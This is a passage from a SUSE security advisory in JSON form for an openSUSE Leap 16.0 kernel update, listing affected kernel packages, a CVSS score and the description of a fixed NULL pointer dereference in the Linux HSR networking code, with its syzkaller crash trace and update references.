"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
